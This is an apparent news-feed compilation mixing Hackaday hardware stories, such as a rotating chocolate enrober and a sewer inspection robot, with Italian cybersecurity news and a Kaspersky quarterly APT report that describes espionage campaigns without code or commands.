This holiday season, [Chaz] wanted to continue his family’s tradition of enrobing a little bit of everything in dark chocolate, and built an improved, rotating chocolate-coating machine.

You may remember last year’s offering, aka the conveyor belt version. Although that one worked, too much chocolate was ultimately lost to the surface of the kitchen table. [Chaz] once again started with a standard chocolate fountain and bought a round wire rack that fits the circumference of the bowl at the bottom. He snipped a hole in the center large enough to accommodate the business part of the fountain and printed a collar with holes that he cleverly zip-tied to the rack.

[Chaz] also printed a large gear to go around the bowl, a small gear to attach to a six RPM motor, a motor mount for the bowl, and an air blade attachment for a portable Ryobi fan. The air blade worked quite well, doing the double duty of distributing the chocolate and thinning out the coating. Plus, it gives things a neat rumpled look on the top.

Want to make some special chocolates this year, but don’t want to build an enrober? Get yourself a diffraction grating and make some rainbow goodies with melted chocolate.

youtube.com/embed/vCmFPCjinH8?…

hackaday.com/2024/11/28/chocol…

The games consoles which came out of Japan in the 1980s are the stuff of legend, with the offerings from Nintendo and Sega weaving themselves into global popular culture. Most of us can recite a list of the main players in the market, but how many of us would have Epoch and their Super Cassette Vision on that list? [Nicole Express] is here with a look at this forgotten machine which tried so hard and yet missed the target when competing with the NES or Master System.

Before the arrival of the Sega and Nintendo cartridge based systems, one of the better known Japanese consoles was the Epoch Cassette Vision. This was something of a hybrid between single-game TV games and an Atari 2600 style computing device for games, in that it used pre-programmed microcontrollers in its cartridges rather than the ROMs of the 2600. For the late-70s gamer this was still hot stuff, but by 1983 as the Master System and NES hove into view it was definitely past its best. Epoch’s response for 1984 was the Super Cassette Vision, a much more conventional 8-bit console with on the face of it some respectable graphics and sound hardware.

The article looks at the console’s capabilities in detail, highlighting the multi-colored sprites and smooth sprite movement, but also the tilemap limitations and the somewhat awful sound chip shared with handheld games and sounding very much like it. Coupled with its inferior controllers and TV game style aesthetic, it’s not difficult to see why it would be the last console from this manufacturer.

If forgotten consoles are your thing, have a read about the Fairchild Channel F, the machine that gave us console cartridges.

hackaday.com/2024/11/28/the-ja…

Le forze dell’ordine africane hanno annunciato l’operazione Serengeti, durante la quale sono state arrestate più di 1.000 persone sospettate di coinvolgimento in attività di criminalità informatica. L’importo totale del danno finanziario causato è stimato a 193 milioni di dollari.

L’operazione è stata coordinata da Interpol e Afripol ed è stata effettuata tra il 2 settembre e il 31 ottobre 2024. È stato riferito che il Serengeti “prendeva di mira principalmente i criminali associati a ransomware, attacchi BEC (compromissione della posta elettronica aziendale), estorsione digitale e frode online”.

Distrutte 134.089 infrastrutture informatiche

In totale, le autorità di 19 paesi africani hanno arrestato 1.006 sospetti e distrutto 134.089 infrastrutture e reti dannose, sulla base delle informazioni operative fornite loro da partner di società di sicurezza informatica come Cybercrime Atlas, Fortinet, Group-IB, Kaspersky Lab, Team Cymru, Trend Micro e la sicurezza di Uppsala.

Gli investigatori hanno scoperto che i sospettati e le loro infrastrutture erano collegati ad almeno 35.224 vittime identificate che hanno perso circa 193 milioni di dollari a causa di vari attacchi di hacking e frode. Durante l’operazione Serengeti, le vittime riuscirono a recuperare circa 44 milioni di dollari.

Una vasta operazione che copre tutta l’Africa

Le forze dell’ordine in regioni specifiche riferiscono che le seguenti azioni sono il risultato del Serengeti.

• Kenya : risolto un caso di frode con carta di credito che comportava perdite per 8,6 milioni di dollari. I fondi sono stati rubati utilizzando script fraudolenti e reindirizzati tramite il sistema SWIFT ad aziende negli Emirati Arabi Uniti, Nigeria e Cina. Sono state effettuate circa due dozzine di arresti.
• Senegal : Scoperto uno schema Ponzi che ha coinvolto 1.811 vittime che hanno perso circa sei milioni di dollari. Sono state sequestrate più di 900 carte SIM, 11.000 dollari in contanti, telefoni, computer portatili e carte d’identità delle vittime. Otto persone sono state arrestate (tra cui cinque cittadini cinesi).
• Nigeria : un uomo è stato arrestato per aver gestito una truffa sugli investimenti online e aver guadagnato 300.000 dollari con false promesse di criptovalute.
• Camerun: è stata smascherata una truffa di network marketing che ha coinvolto vittime provenienti da sette paesi. Alle vittime era stato promesso un lavoro, ma alla fine sono state tenute prigioniere e costrette a reclutare altre persone per essere rilasciate. Il gruppo ha raccolto almeno 150.000 dollari in quote associative.
• Angola: sono state interrotte le attività di un gruppo internazionale che gestisce un casinò virtuale a Luanda. Centinaia di persone sono state ingannate con promesse di vincite in cambio dell’attrazione di nuovi membri. Sono stati effettuati 150 arresti, sequestrati 200 computer e più di 100 telefoni cellulari.

All’operazione Serengeti hanno preso parte anche Algeria, Benin, Costa d’Avorio, RDC, Gabon, Ghana, Mauritius, Mozambico, Ruanda, Sud Africa, Tanzania, Tunisia, Zambia e Zimbabwe.

L'articolo Operazione Serengeti in Africa: 1.000 hacker criminali arrestati e 193 milioni di dollari di danni! proviene da il blog della sicurezza informatica.

Kaspersky’s Global Research and Analysis Team (GReAT) has been releasing quarterly summaries of advanced persistent threat (APT) activity for over seven years now. Based on our threat intelligence research, these summaries offer a representative overview of what we’ve published and discussed in more detail in our private APT reports. They are intended to highlight the significant events and findings that we think are important for people to know about. This is our latest roundup, covering activity we observed during Q3 2024.

If you’d like to learn more about our intelligence reports or request more information about a specific report, please contact intelreports@kaspersky.com.

The most remarkable findings

In the second half of 2022, a wave of attacks from an unknown threat actor targeted victims with a new type of attack framework that we dubbed P8. The campaign targeted Vietnamese victims, mostly from the financial sector, with some from the real estate sector. Later, in 2023, Elastic Lab published a report about an OceanLotus APT (aka APT32) attack that leveraged a new set of malicious tools called Spectral Viper. Although the campaigns are the same, we cannot conclusively attribute P8 to OceanLotus.

The P8 framework includes a loader and multiple plugins. Except for the first-stage loader and the PipeShell plugin, all plugins are downloaded from the C2 and then loaded into memory, leaving no trace on disk. After a thorough analysis of the framework and its modules, we believe P8 was developed based on the open source project C2Implant, which is a red teaming C2 framework. However, P8 contains many built-in functions and redesigns of the communication protocol and encryption algorithm, making it a well-designed and powerful espionage platform. Based on the implemented supported commands, we suspect the goal is to implement another Cobalt Strike-like post-exploitation platform. Methods to gain persistence on affected systems are not built in and depend on commands received from the C2.

Unfortunately, we were unable to obtain any bait files or initial infection vectors. Based on limited telemetry, we believe with medium to low confidence that some of the initial infections were spear-phishing emails. Notably, these attacks use an obsolete version of the Kaspersky Removal Tool to side-load the P8 beacon. We also observed SMB and printer driver vulnerabilities being used to move laterally through the network.

We published a follow-up report on P8 that describes the plugins used in the attacks. Each time the system restarts, or as required by the operation, P8 downloads additional plugins from the C2 or loads them from disk into memory. So far, we have collected 12 plugins or modules that are used to support the operation by adding functionality for lateral movement, exfiltration, file management, credential stealing, taking screenshots or custom loading capabilities. In particular, two plugins are used to upload files of interest; one plugin is used for small files, while a second is used to upload large files to another server, presumably to reduce the network load on the C2.

We subsequently detected new attacks from this threat actor. While carrying out these attacks, the actor changed its TTPs from those outlined in our previous reports. For example, new persistence mechanisms were detected and we found that the loading mechanism of the final payload, the P8 beacon, also changed. In terms of victimology, there was little change. Most of the infections were still at financial institutions in Vietnam, with one victim active in the manufacturing industry. The infection vector has still not been found, nor have we been able to link these attacks to OceanLotus (APT32).

Earlier in 2024, a secure USB drive was found to be compromised and malicious code was injected into the access management software installed on the USB drive. The secure USB drive was developed by a government entity in Southeast Asia to securely store and transfer files between machines in sensitive environments. The access management software facilitates access to the encrypted partition of the drive. A Trojanized version of the software module was found to be used in these attacks. The malicious code injected into it is designed to steal sensitive files saved on the secure partition of the drive, while also acting as a USB worm and spreading the infection to USB drives of the same type.

Last year we investigated attacks against another different type of secure USB drive. Similarly, the attacks were delivered via a Trojanized USB management software called UTetris. We are tracking the threat actor behind the UTetris software attack as TetrisPhantom. In addition to the Trojanized UTetris software, TetrisPhantom uses a number of other malicious tools that have been in use for a few years. TetrisPhantom is still active and new samples of its tools have recently been detected.

While both the tactic of targeting a secure USB drive by compromising the software module installed on the drive and the victim profile in the recent attacks are similar to TetrisPhantom attacks, the malicious code implanted in the drive bears little similarity to the code injected into the utetris.exe program.

Our report provided an initial analysis of the Trojanized USB management program.

Chinese-speaking activity

In July 2021, we detected a campaign called ExCone targeting government entities in Russia. The attackers leveraged the VLC media player to deploy the FourteenHi backdoor after exploiting MS Exchange vulnerabilities. We also found Cobalt Strike beacons and several traces tying this actor to the ShadowPad malware and UNC2643 activity, which is in turn associated with the HAFNIUM threat actor.

Later that year, we discovered a new set of activities. This time the victimology changed: victims were also found in Europe, Central Asia and Southeast Asia. We also found new samples that we linked to Microcin, a Trojan used exclusively by SixLittleMonkeys. Shortly after, another campaign called DexCone was discovered, with similar TTPs to the ExCone campaign. Several new backdoors such as Pangolin and Iguania were discovered, both of which have similarities to FourteenHi.

Then, in 2022, we discovered another campaign by the same threat actor targeting Russia, with a special interest in government institutions, using spear-phishing emails as an infection vector and deploying an updated version of the Pangolin Trojan.

After that, we did not observe any new activity related to this actor until mid-July 2024. In this most recent campaign, the actor uses spear-phishing emails, embedding a JavaScript loader as the initial infection vector. The JavaScript loader loads yet another loader from a ZIP file, which in turn downloads a BMP image containing shellcode and an embedded PE file, which is the final payload. This is a new backdoor with limited functionality, reading and writing to files and injecting code into the msiexec.exe process. In this campaign, the actor decided to attack Russian educational institutions instead of government entities as it had previously.

The Scieron backdoor, a tool commonly used in cyber-espionage campaigns by the Scarab group, was detected in a new campaign. This campaign introduces novel decoders and loaders that use machine-specific information to decode and decrypt the Scieron backdoor and run it in memory. The campaign has specifically targeted a government entity in an African country and a telecoms provider in Central Asia. Notably, the infections within the telecoms provider have been traced back to 2022.

More recently, in June 2024, an updated infection chain was identified, with an updated set of decoders and loaders designed to run the Scieron backdoor and make it persistent. Our private report also provides a detailed description of the attackers’ post-compromise activities.

Europe

Awaken Likho is an APT campaign, active since at least July 2021, primarily targeting government organizations and contractors. To date, we have detected more than 120 targets in Russia, but there are also targets in other countries and territories such as India, China, Vietnam, Taiwan, Turkey, Slovakia, the Philippines, Australia, Switzerland and the Czech Republic, among others. Based on our findings, we would like to highlight two specific features of this campaign: all attacks are well prepared, and the hackers rely on the use of the legitimate remote administration tool UltraVNC. While this approach is rather simplistic, the attackers have been using this technique successfully for years.

We discovered a new Awaken Likho campaign that emerged in May 2024, in which the threat actor adjusted its TTPs slightly. The threat actor cleaned up its Golang SFX-based archives by removing unused files and also switched to executing AutoIT scripts after file extraction. UltraVNC remained the final payload, but in this campaign it was made to look like a OneDrive update utility. The targeting remained the same as in the earlier campaign – mainly government organizations and their contractors located in Russia.

Awaken Likho then adjusted its TTPs again, in a campaign uncovered in June 2024 that is still ongoing. The threat actor continued to favor the use of AutoIT scripts and also began using protectors such as Themida to protect its samples. While most of the samples we found still deployed the UltraVNC module, the attackers changed the final payload from UltraVNC to MeshAgent in several samples. Unlike previous campaigns, we did not observe the Golang SFX droppers this time. The nature of the threat actor, leveraging open source and free tools, allows it to quickly change its arsenal during active campaigns.

Epeius is a commercial spyware tool developed by an Italian company that claims to provide intelligence solutions to law enforcement agencies and governments. In recent years, the malware attracted the attention of the community due to the publication of two articles. The first, published in 2021 by Motherboard and Citizen Lab, shared the first evidence and indicators related to the software. The second, an article published in 2024 by the Google Threat Analysis Group, described the business model of various companies that provide commercial surveillance solutions. Knowledge of this threat is sparse and the Epeius malware has never been publicly described in detail. Our own threat hunting efforts to obtain related samples started in 2021, and last year we discovered a DEX file that we attribute with medium to high confidence to Epeius. Our private report describes what we know about Epeius and provides a technical description of its main Android component.

Middle East

In September 2023, our colleagues at ESET published a report on a newly discovered and sophisticated backdoor used by the FruityArmor threat actor, which they named DeadGlyph. The same month, we released an APT report detailing the ShadowWhisperer and NightmareLoader tools used in conjunction with the DeadGlyph malware. More recently, we identified what appears to be the latest version of the native DeadGlyph Executor backdoor module, with changes to both its architecture and workflow components.

MuddyWater is an APT actor that surfaced in 2017 and has traditionally targeted countries in the Middle East, Europe and the USA. The actor typically uses multi-stage PowerShell execution in its attacks, probably to obfuscate the attacks, evade defenses and hinder analysis.

Recently we uncovered VBS/DLL-based implants used in intrusions by the MuddyWater APT group that are still active today. The implants were found at multiple government and telecoms entities in Egypt, Kazakhstan, Kuwait, Morocco, Oman, Syria and the UAE. The threat actor achieves persistence through scheduled tasks that execute a malicious VBS file with the wscript.exe utility.

The TTPs and infrastructure we analyzed for the current intrusions are similar to previously reported intrusions by the MuddyWater APT group.

Southeast Asia and Korean Peninsula

Gh0st RAT, an open source RAT created about 15 years ago, is used by various groups, including state-sponsored actors. One of them is Dragon Breath (aka APT-Q-27 and Golden Eye Dog), first discussed in 2020 in connection with a watering hole campaign aimed at tricking users into installing a Trojanized version of Telegram. By 2022, the group was still using Trojanized Telegram applications as an infection vector, but had changed the final payload to Gh0st RAT.

A year later, Sophos published a blog post describing the latest change in the group’s TTPs, which included double side-loading DLLs. Since then, the Gh0st RAT payload has remained the same, but the attackers have again slightly adjusted their TTPs. DLL side-loading was abandoned and replaced by leveraging a logical flaw in a version of the TrueUpdate application, while more recently the group began to run the malware via a Python-based infection chain executed by the installer package.

Historically, Dragon Breath has targeted the online gaming and gambling industry. Given the nature of the infection vector, we’re not yet able to determine the target audience for this campaign. The attack begins by tricking users into downloading a malicious MSI installer. Once the installer is started, the malware is installed alongside the legitimate application. We believe the victim is prompted to download and launch it from a fake site while searching for a Chinese version of the legitimate TrueUpdate MSI installer.

Bitter APT has been active for over a decade. Since late 2023, this threat actor has used and continues to use CHM (compiled HTML) files, LNK shortcuts and DOC files as the first stage of infection. These files carry malicious scripts to connect to a remote server and download the next stage of the attacks, and appear to be used as attachments to spear-phishing emails. The payloads delivered via these malicious scripts represent new samples of backdoor modules described in previous private reports. However, in several cases, the final payloads can only be downloaded by pre-selected system configurations authorized by the threat actor after the initial reconnaissance phase. In a recent report, we discussed the workflow of the initial LNK, DOC and CHM files, their progress through the next stages of the attack, as well as the updates to the final backdoor modules and corresponding infrastructure.

Tropic Trooper (aka KeyBoy and Pirate Panda) is an APT group operating since 2011. The group’s targets have traditionally been in government, as well as the healthcare, transportation and high-tech industries located in Taiwan, the Philippines, and Hong Kong. Our most recent investigation revealed that in 2024, the group conducted persistent campaigns against a government entity in Egypt, which began in June 2023.

We noticed the infection in June 2024, when our telemetry showed recurring alerts for a new China Chopper web shell variant (China Chopper is used by many Chinese-speaking actors) found on a public web server. The server hosted a Content Management System (CMS) called Umbraco, an open source CMS platform for publishing content written in C#. The observed web shell component was compiled as a .NET module of Umbraco CMS.

During our subsequent investigation, we looked for other suspicious detections on this public server and identified several related malware sets. These include post-exploitation tools that we believe with medium confidence are related and being used as part of this intrusion.

We also identified new DLL search-order hijacking implants that are loaded from a legitimate vulnerable executable because it lacks the full path to the required DLL. This attack chain attempted to load the Crowdoor loader, named after SparrowDoor described by ESET. During the attack, the security agent blocked the first Crowdoor loader, which prompted the attackers to switch to a new, as yet unreported variant, with almost the same effect.

We investigated the attribution of this activity to the Chinese-language threat actor known as Tropic Trooper. Our findings show an overlap in capabilities reported in recent Tropic Trooper campaigns. The samples we found also show a high degree of overlap with samples previously attributed to Tropic Trooper.

PhantomNet is a RAT first described by ESET in late 2020. In 2021, we released our analysis of the PhantomNet malware, which at the time was being used in attacks against the Vietnamese government sector. Our report discussed in detail the plugins we found and the commands it supported.

We rediscovered PhantomNet during a recent investigation into a cyberattack on the Brazilian education and government sectors that occurred in April. This time we were able to recover several scripts, commands executed by the attackers, and the PhantomNet builder tool. The threat actor has changed the persistence mechanism so that the payload is now stored in an encrypted manner in the Windows registry and with an associated loader to retrieve the payload from the registry. There are also some changes to the victimology. Previously, PhantomNet infections were found in Asia, but now the infections have been found in many regions around the world and affect a wide variety of industries.

We discussed these findings in our private report, filling in the gaps from our previous report.

We have observed that the Kimsuky group uses a strategy of registering malware as a service for reliable persistence. The so-called ServiceChanger malware drops a malicious DLL file and registers a service disguised as a legitimate service. In the case we analyzed, ServiceChanger installed the TOGREASE malware, which is an evolved version of GREASE that adds the ability to toggle RDP activation when necessary by the operator; and in another instance, it was observed installing the XMRig miner.

In addition, this year’s updated version of the GREASE malware creates backdoor accounts to use RDP connections under the names “Guest” and “IIS_USER”, respectively. They borrow code from the publicly available UACME, allowing them to bypass UAC and execute commands with escalated privileges. Uniquely, the resources section within the GREASE malware includes a Zoom Opener installer vulnerable to DLL hijacking, which has not been observed in use by Kimsuky. However, it is possible that they may create malware that exploits this vulnerability in the future.

The updated GREASE malware is thought to be connected to the RandomQuery malware also used by Kimsuky, as it communicates with the C2 in a similar manner. The similarity and the overlap between the TOGREASE and GREASE malware used by the Kimsuky group suggests that this group is behind the malware.

Hacktivism

In the course of our research on hacktivist groups targeting organizations based in Russia, we have identified similarities among several of these groups. This suggests either that these clusters of activity share at least a subset of the same individuals, or that the groups are working closely together in their attacks. Our report details the tools, malware, and procedures of the BlackJack group and links it to the previously known group Twelve. In addition, further examination of its preferred wiper and ransomware tools uncovered samples that cannot be definitively attributed to either group.

Other interesting discoveries

In June, we identified an active campaign called “PassiveNeuron”, targeting government entities in Latin America and East Asia using previously unknown malware. The servers were compromised before security products were installed, and the method of infection is still unknown. The implants used in this operation were dubbed “Neursite” and “NeuralExecutor”. They do not share any code similarities with known malware, so attribution to a known threat actor is not possible at this time. The campaign shows a high level of sophistication, with the threat actor using compromised internal servers as an intermediate C2 infrastructure. The threat actor is able to move laterally through the infrastructure and exfiltrate data, optionally creating virtual networks that allow attackers to steal files of interest even from machines isolated from the internet. A plugin-based approach provides dynamic adaptation to the attacker’s needs.

In mid-April, we discovered a suspicious domain which, upon further investigation, revealed two backdoors written in Golang. During analysis, another backdoor was discovered that was used earlier in the attack timeline and protected using VMProtect. As well as the backdoors, an unknown keylogger and the use of the SOCAT tool were observed in this attack. The campaign exhibits a few peculiarities. First, the Golang backdoor uses Google Translate services as a proxy to communicate with the C2. Second, the threat actor tries to imitate Kaspersky software in terms of file names and names of scheduled tasks. Thirdly, we found only one infection, targeting a telecoms research center in India. We were unable to attribute this campaign to any known threat actor based on code similarity or TTPs.

In early April, we decided to take a closer look at the Windows Desktop Window Manager (DWM) Core Library Elevation of Privilege vulnerability (CVE-2023-36033), which was previously discovered as a zero-day and exploited in the wild. While searching for samples related to this exploit and attacks using it, we found a document of note that was uploaded to a multi-scanner service on April 1, 2024. This document had a rather descriptive file name, indicating that it contained information about a vulnerability in the Windows operating system. Inside the document we found a brief description of a Windows Desktop Window Manager vulnerability and how it could be exploited to gain system privileges.

The exploitation process described in the document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033. However, the vulnerability was different. Judging by the quality of the writing and the fact that the document was missing critical details about how to actually trigger the vulnerability, there was a high probability that the vulnerability described was made up or was present in code that could not be accessed or controlled by the attackers. The subsequent investigation revealed a zero-day vulnerability that can be used to escalate privileges. After reporting the findings to Microsoft, the vulnerability was designated CVE-2024-30051 and a patch was released as part of Patch Tuesday on May 14, 2024.

After closely monitoring our statistics for related exploits and attacks, it became clear that there were several exploits for this zero-day vulnerability. Our discoveries showed that it was being used in conjunction with QakBot and other malware such as NewBot, leading us to believe that multiple threat actors have access to it. While previous findings of in-the-wild exploitation of CVE-2024-30051 showed financial motivation, it is possible that it could be leveraged in future APT activity.

An updated set of intrusions, possibly related to the Deathstalker cyber-mercenary group, employs an updated DarkMe VB6 OCX/DLL implant and stealthier TTPs, such as a more sophisticated infection chain.

In the intrusions we reported previously, the threat actor typically delivered the initial dropper through instant messaging (IM) apps such as Skype. In more recent intrusions, the actor typically delivered the initial dropper through Telegram. We assess with medium confidence that the threat actor delivered the initial droppers via Telegram channels related to e-trading and fintech news.

Apart from the delivery method, the attackers also increased their level of OPSEC and post-compromise cleanup by deleting post-exploitation files, tools, and registry keys after the operators achieve their objectives. Such actions, in turn, make the infection harder to detect and complicate post-compromise investigation.

Final thoughts

While some threat actors’ TTPs remain consistent over time, such as a heavy reliance on social engineering as a means of gaining entry into a target organization or compromising an individual’s device, others have updated their toolsets and expanded the scope of their activities. Our regular quarterly reviews are designed to highlight the most significant developments related to APT groups.

Here are the key trends we observed in Q3 2024:

• This quarter, we saw threat actors broaden their targeting, both in terms of verticals and geography.
• The purpose of most APT activity is cyber-espionage, although hacktivist attacks remain a feature of the threat landscape this quarter, mirroring areas of real-world conflict.
• Even more open source tools have been employed by APT threat actors, mostly to manage network connectivity with C2s.
• We continue to see threat actors using LOTL (Living off the Land) techniques in their campaigns.

As always, we would like to point out that our reports are the product of our visibility into the threat landscape. However, it is important to remember that while we strive for continuous improvement, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: When we refer to APT groups as Russian-speaking, Chinese-speaking, etc., we are referring to various artifacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) that contain words in those languages, based on information we have obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relationship, but rather indicates the languages used by the developers behind these APT artifacts.

securelist.com/apt-report-q3-2…

Spoiler alert: almond butter isn’t phosphorescent. But powdered milk is, at least to the limit of detection of this homebrew phosphorescence detector.

Why spend a bunch of time and money on such a thing? The obvious answer is “Why not?”, but more specifically, when [lcamtuf]’s son took a shine (lol) to making phosphorescent compounds, it just seemed natural for dad to tag along in his own way. The basic concept of the detector is to build a light-tight test chamber that can be periodically and briefly flooded with UV light, charging up the putatively phosphorescent compounds within. A high-speed photodiode is then used to detect the afterglow, which can be quantified and displayed.

The analog end of the circuit was the far fussier end of the design, with a high-speed transimpedance amplifier to provide the needed current gain. Another scaling amp and a low-pass filter boosts and cleans up the signal for a 14-bit ADC. [lcamtuf] went to great lengths to make the front end as low-noise as possible, including ferrite beads and short leads to prevent picking up RF interference. The digital side has an AVR microcontroller that talks to the ADC and runs an LCD panel, plus switches the 340 nm LEDs on and off rapidly via a low gate capacitance MOSFET.

Unfortunately, not many things found randomly around the average home are all that phosphorescent. We’re not sure what [lcamtuf] tried other than the aforementioned foodstuffs, but we’d have thought something like table salt would do the trick, at least the iodized stuff. But no matter, the lessons learned along the way were worth the trip.

hackaday.com/2024/11/28/homebr…

There can be few among those of us who produce printed circuit boards, who have not at some point placed a component the wrong way round, or with the wrong footprint. Usually this can be rectified with a bit of rework and a fresh board spin, but just occasionally these mishaps make it into the wild undetected. It seems nobody is immune, as [Doug Brown] is here to tell us with a tale of an Apple product with a misplaced capacitor.

The LC series of Macs came out through the early 1990s, and their pizza-box style cases could be found slowly turning yellow in universities and schools throughout that decade. Of them there was a persistent rumor of the LCIII had a misplaced capacitor, so when he received an unmodified original machine he took a look. The investigation is quite simple, but revealing — there are three power supply rails and one of the capacitors does have a significant leak.

The explanation is simple enough, the designer had placed a capacitor on each rail, with its negative side to the ground plane, but one of the rails delivers -5 volts. Thus the capacitor is the wrong way round, and must have failed pretty early in the lifetime of each LCIII. We’re curious then since so many of them went through their lives without the component being replaced, how the circuit remained functional. We’re guessing that there were enough other capacitors in the -5 volt line to provide enough smoothing.

hackaday.com/2024/11/27/even-a…

Nelle ultime settimane, il panorama delle minacce è stato scosso dall’emergere di attacchi che sfruttano la combinazione letale di due vulnerabilità zero-day, CVE-2024-9680 e CVE-2024-49039, collegate rispettivamente a Firefox e a Windows. L’obiettivo è stato identificato in una campagna mirata guidata dal gruppo di cybercriminali dietro la backdoor RomCom. Questa operazione dimostra una sofisticazione crescente nei metodi di attacco e una pericolosa rapidità nello sfruttamento di vulnerabilità.

Le vulnerabilità e il meccanismo di attacco

CVE-2024-9680, una vulnerabilità use-after-free nelle timeline di animazione di Firefox, permette l’esecuzione di codice malevolo senza necessità di interazione da parte della vittima. Gli attacchi che sfruttano questa vulnerabilità sono stati confermati in-the-wild, con un punteggio di gravità pari a 9.8 su 10, evidenziando la sua pericolosità e criticità.

La seconda vulnerabilità, CVE-2024-49039, una falla di elevazione dei privilegi in Windows, consente agli attaccanti di compromettere il sistema sfruttando la combinazione con lo zero-day di Firefox, guadagnando accesso completo al dispositivo della vittima.

La catena di compromissione, scoperta da Damien Schaeffer di ESET, ha avuto inizio con un sito web malevolo progettato per reindirizzare gli utenti a un server che ospitava un exploit zero-click. Non è stata necessaria alcuna interazione da parte dell’utente: una volta attivato, l’exploit scaricava e installava RomCom Backdoor, un malware avanzato che consente agli attaccanti di eseguire comandi remoti, raccogliere informazioni sensibili e scaricare moduli aggiuntivi per ampliare le capacità del malware.

La campagna, attiva tra ottobre e novembre 2024, ha colpito principalmente utenti in Europa e Nord America, mirandoli in particolare nei settori governativo, energetico e sanitario. La scelta di questi settori strategici sottolinea l’interesse di RomCom per dati sensibili e operazioni di sabotaggio.

Mappa delle potenziali vittime che riporta ESET

RomCom: Il gruppo dietro gli attacchi

RomCom (noto anche come Tropical Scorpius o UNC2596) è un gruppo di cybercriminali allineato con la Russia, coinvolto in numerose campagne di cybercrimine e spionaggio. Già nel 2023, aveva sfruttato un attacco zero-day tramite Microsoft Word, dimostrando la sua capacità di adattarsi alle nuove vulnerabilità. Nel 2024, RomCom ha espanso la sua attività colpendo settori critici in Ucraina, Europa e Stati Uniti, confermando l’intensificazione della sua operatività nel rubare dati strategici e danneggiare infrastrutture critiche.

Tempestività nelle Patch

La tempestività nella risposta alle vulnerabilità è stata cruciale per mitigare l’impatto di questa campagna. Mozilla, ad esempio, ha dimostrato una reattività eccezionale: entro 48 ore dalla segnalazione da parte di ESET, sono stati distribuiti aggiornamenti per Firefox e Thunderbird, garantendo protezione agli utenti contro CVE-2024-9680. Anche Microsoft ha seguito rapidamente con il rilascio della patch per CVE-2024-49039 il 12 novembre, chiudendo un’importante porta di accesso sfruttata dagli attaccanti. Questi interventi rapidi hanno dimostrato l’importanza di una collaborazione efficace tra ricercatori di sicurezza e aziende tecnologiche per contenere le minacce prima che possano espandersi su scala più ampia.

Raccomandazioni

1. Aggiornamenti immediati: Applicare prontamente le patch per i browser e i sistemi operativi è fondamentale per proteggere i propri dispositivi da vulnerabilità simili a quelle sfruttate in questa campagna.
2. Monitoraggio continuo: Implementare strumenti avanzati di rilevamento per identificare movimenti laterali e comandi malevoli è cruciale per evitare che gli attaccanti possano passare inosservati.
3. Consapevolezza del personale: Formare i dipendenti sui rischi legati a siti web fasulli e vulnerabilità zero-click può fare la differenza nella prevenzione degli attacchi.

Conclusione

La campagna RomCom evidenzia una crescente sofisticazione nelle operazioni dei gruppi di cybercriminali allineati a stati nazionali, con un utilizzo sempre più frequente di vulnerabilità zero-day per eseguire attacchi mirati e devastanti. La combinazione di falle in Firefox e Windows ha dimostrato come gli exploit possano aggirare le protezioni tradizionali, colpendo senza alcuna interazione da parte delle vittime. Tuttavia, la tempestività nella distribuzione delle patch da parte di Mozilla e Microsoft sottolinea l’importanza di una risposta rapida e coordinata per limitare i danni. Questa vicenda ci ricorda l’urgenza di mantenere sistemi aggiornati, monitorare attivamente le minacce e investire nella sicurezza informatica, poiché i rischi non solo evolvono, ma colpiscono con una velocità senza precedenti.

L'articolo Scoperto l’attacco zero-day più sofisticato del 2024 e RomCom e la Backdoor invisibile proviene da il blog della sicurezza informatica.

If you think your job sucks, be grateful you’re not this homebrew sewer inspection robot.

Before anyone gets upset, yes we know what [Stargate System] built here isn’t a robot at all; it’s more of a remotely operated vehicle. That doesn’t take away from the fact that this is a very cool build, especially since it has to work in one of the least hospitable and most unpleasant environments possible. The backstory of this project is that the sewer on a 50-year-old house kept backing up, and efforts to clear it only temporarily solved the problem. The cast iron lateral line was reconfigured at some point in its history to include a 120-degree bend, which left a blind spot for the camera used by a sewer inspection service. What’s worse, the bend was close to a joint where a line that once allowed gutters and foundation drains access to the sewer.

To better visualize the problem, [Stargate] turned to his experience building bots to whip up something for the job. The bot had to be able to fit into the pipe and short enough to make the turn, plus it needed to be — erm, waterproof. It also needed to carry a camera and a light, and to be powered and controlled from the other end of the line. Most of the body of the bot, including the hull and the driving gear, was 3D printed from ABS, which allowed the seams to be sealed with acetone later. The drive tracks were only added after the original wheels didn’t perform well in testing. Controlling the gear motors and camera was up to a Raspberry Pi Zero, chosen mostly due to space constraints. An Ethernet shield provided connectivity to the surface over a Cat5 cable, and a homebrew PoE system provided power.

As interesting as the construction details were, the real treat is the down-hole footage. It’s not too graphic, but the blockage is pretty gnarly. We also greatly appreciated the field-expedient chain flail [Stargate] whipped up to bust up the big chunks of yuck and get the pipe back in shape. He did a little bit of robo-spelunking, too, as you do.

And no, this isn’t the only sewer bot we’ve ever featured.

youtube.com/embed/adGp3PADKsk?…

hackaday.com/2024/11/27/diy-pi…

[Angus] of Maker’s Muse has a video with a roundup of different 3D-printable hinge designs, and he points out that a great thing about 3D printing objects is that adding printable features to them is essentially free.
These hinges have an indexing feature that allows them to lock into place, no additional parts needed.
A great example of this is his experimental print-in-place butt hinge with indexing feature, which is a hinge that can lock without adding any additional parts. The whole video is worth a watch, but he shows off the experimental design at the 7:47 mark. The hinge can swing normally but when positioned just right, the squared-off pin within slots into a tapered track, locking the part in place.

Inspired by a handheld shopping basket with a lockable handle, [Angus] worked out a design of his own and demonstrates it with a small GoPro tripod whose legs can fold and lock in place. He admits it’s a demonstration of the concept more than a genuinely useful tripod, but it does show what’s possible with some careful design. Being entirely 3D printed in a single piece and requiring no additional hardware is awfully nice.

3D printing is very well-suited to this sort of thing, and it’s worth playing to a printer’s strengths to do for pennies what one would otherwise need dollars to accomplish.

Want some tips on designing things in a way that take full advantage of what a 3D printer can achieve? Check out printing enclosures at an angle with minimal supports, leveraging the living hinge to print complex shapes flat (and fold them up for assembly), or even print a one-piece hinge that can actually withstand a serious load. All of those are full of tips, so keep them in mind the next time you design a part.

hackaday.com/2024/11/27/would-…

Le Ransomware Gang colpiscono anche le squadre del cuore. Il Bologna FC, uno dei club storici della Serie A, è stata rivendicata come vittima di un attacco ransomware presumibilmente condotto dal gruppo RansomHub.

Questo attacco evidenzia come i cybercriminali non risparmino neanche il mondo dello sport, utilizzando l’esfiltrazione di dati sensibili come leva per estorcere denaro. Secondo quanto riportato, sarebbero stati sottratti 200 GB di dati riservati, inclusi documenti aziendali, strategie di mercato e informazioni personali di tifosi, calciatori e staff.

